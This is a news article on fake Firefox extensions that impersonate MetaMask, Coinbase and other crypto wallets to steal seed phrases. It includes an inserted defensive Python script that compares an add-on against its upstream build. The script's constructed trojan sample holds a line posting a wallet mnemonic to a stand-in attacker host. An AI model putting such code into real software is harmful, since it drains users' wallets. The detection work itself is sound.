Malicious Firefox extensions mimic MetaMask, Coinbase to steal crypto

Researchers at cybersecurity firm Koi Security have flagged over 40 fake Firefox extensions designed to steal cryptocurrency wallet credentials by impersonating popular platforms like MetaMask, Coinbase, and OKX.
Cryptocurrency assets held by users of Firefox, a widely used open-source browser, are at risk, according to a recent report from the security firm.
A large-scale campaign, active since at least April 2025, is leveraging malicious extensions still available on the Mozilla Add-ons store, highlighting significant gaps in the browser’s plugin vetting process.
Koi Security warns that these fake extensions mirror legitimate wallet offerings with alarming accuracy, using the same names, logos, and branding to deceive users.
In many cases, the extensions are built from the source code of open-source wallets, with malicious code discreetly inserted to steal wallet secrets while the extension otherwise works as expected.
Some of the brands impersonated by the fake Firefox extensions include MetaMask, Coinbase, OKX, Trust Wallet, Phantom, Exodus, Keplr, MyMonero, Bitget, Leap, Ethereum Wallet, and Filfox.
Earlier this year, OKX warned of a fake browser extension listed on the Firefox store, which mimicked the exchange's official extension to steal credentials from victims' wallets.
Malicious extensions still live on Firefox store
Koi linked the campaign to over 40 individual extensions through shared tactics, techniques, and procedures, as well as overlapping infrastructure.
According to the report, the campaign is currently “active, persistent, and evolving,” with new versions of the extensions continuing to appear despite takedown efforts. The latest uploads were detected as recently as June.
Once installed, the fake extensions silently extract wallet secrets and transmit them to a remote server controlled by the attackers.
In addition to stealing login credentials, the malware captures users’ external IP addresses, potentially to aid in further profiling or follow-on attacks.
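The two observations above, that the extensions are copies of open-source wallets with code inserted, and that the inserted code sends secrets to a remote server, suggest a check a practitioner can run before trusting an installed add-on: unpack the .xpi (a zip archive) and compare it file by file against the upstream project's own build, then inspect only the files that were added or changed for code that both touches key material and makes network calls. The script below is an added example and is not code from Koi Security, Mozilla or any wallet project; the sample archives, the marker lists and the hostname collector.invalid are constructed for illustration.

```python
"""Compare a packaged Firefox extension (.xpi is a zip) against the upstream
open-source build it claims to be, and flag files that were added or changed.
Added example; not code from Koi Security, Mozilla or any wallet project.
Sample archive contents and the marker lists below are constructed assumptions."""
import hashlib
import io
import re
import zipfile

# Constructed markers that tend to co-occur in exfiltration code: access to a
# seed phrase or private key plus an outbound request. A hit is a lead for
# manual review, not proof of malice.
SECRET_PATTERNS = [r"mnemonic", r"seed ?phrase", r"privateKey"]
EGRESS_PATTERNS = [r"fetch\(", r"XMLHttpRequest", r"navigator\.sendBeacon"]


def _hashes(xpi_bytes):
    """Map each file in the archive to the SHA-256 of its contents."""
    out = {}
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            out[info.filename] = hashlib.sha256(zf.read(info)).hexdigest()
    return out


def _suspicious(text):
    """True when a file both reads secret material and has an egress path."""
    has_secret = any(re.search(p, text) for p in SECRET_PATTERNS)
    has_egress = any(re.search(p, text) for p in EGRESS_PATTERNS)
    return has_secret and has_egress


def diff_extension(upstream_xpi, installed_xpi):
    """Return added/removed/modified file lists plus the subset of added or
    modified JavaScript files that match the exfiltration heuristic."""
    up, inst = _hashes(upstream_xpi), _hashes(installed_xpi)
    added = sorted(set(inst) - set(up))
    removed = sorted(set(up) - set(inst))
    modified = sorted(f for f in set(up) & set(inst) if up[f] != inst[f])
    flagged = []
    with zipfile.ZipFile(io.BytesIO(installed_xpi)) as zf:
        for name in added + modified:
            if name.endswith(".js") and _suspicious(zf.read(name).decode("utf-8", "replace")):
                flagged.append(name)
    return {"added": added, "removed": removed, "modified": modified, "flagged": flagged}


def _make_xpi(files):
    """Build an in-memory zip from a {name: content} mapping (constructed input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample: a trimmed "upstream" wallet and a trojanized copy that
# keeps the manifest byte-identical, patches one file to pull in a new module,
# and adds that module, which posts the mnemonic to an attacker host.
UPSTREAM = _make_xpi({
    "manifest.json": '{"name": "Example Wallet", "version": "1.0"}',
    "background.js": "const wallet = loadWallet();\nexport { wallet };\n",
})
TROJANIZED = _make_xpi({
    "manifest.json": '{"name": "Example Wallet", "version": "1.0"}',
    "background.js": "const wallet = loadWallet();\nimport './exfil.js';\nexport { wallet };\n",
    "exfil.js": "fetch('https://collector.invalid/c', {method: 'POST', "
                "body: JSON.stringify({m: wallet.mnemonic})});\n",
})

if __name__ == "__main__":
    print(diff_extension(UPSTREAM, TROJANIZED))
```

Against real add-ons, the upstream side should come from a build you produced yourself from the project's tagged source, since a prebuilt archive from a third party is exactly what you are trying to verify. The heuristic deliberately inspects only files that differ, which keeps review time proportional to the injected code rather than to the size of the wallet.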
To encourage downloads, attackers also exploit trust mechanisms on the plugin marketplace.
Many of the fake extensions are propped up with hundreds of fake five-star reviews, far exceeding what would be expected based on actual user installations.
Koi found signs pointing to a Russian-speaking threat actor, including Russian-language comments embedded in the extension code and metadata retrieved from a command server used in the operation.
While attribution remains tentative, Koi researchers believe these indicators suggest a well-organized and technically proficient group.
The scale and sophistication of the campaign pose a significant threat to crypto users.
By hijacking browser extensions, a commonly trusted tool among traders and investors, attackers can bypass traditional phishing defences and gain direct access to wallets.
Since these extensions often run with broad permissions, they can drain a victim's accounts before the victim notices anything is wrong.
An age-old tactic
Campaigns such as these underscore the risks retail crypto users face, especially as cryptocurrency adoption increases and browser-based wallet interactions become more common.
According to a NASAA survey, crypto-related fraud and social media-based scams remain among the top threats to investors in 2025.
Over the past years, malicious browser extensions have become a prominent tool in the cybercriminal’s arsenal, with incidents surfacing across other browsers as well.
For instance, in March, a compromised version of the Chrome proxy tool SwitchyOmega was found stealing private keys from crypto wallets after a phishing attack enabled malicious code injection.
Another malicious Chrome extension dubbed “Bull Checker” was flagged by Solana-based DEX Jupiter last year. The extension drained user wallets by modifying transaction payloads.
Similar tactics have also been employed in earlier campaigns involving fake versions of the Ledger Live app and Aggr trading tools.
Some extensions prompt users to enter their seed phrases during setup, while others quietly harvest browser cookies, which can then be replayed to hijack logged-in sessions on exchanges and other crypto services.
The post Malicious Firefox extensions mimic MetaMask, Coinbase to steal crypto appeared first on Invezz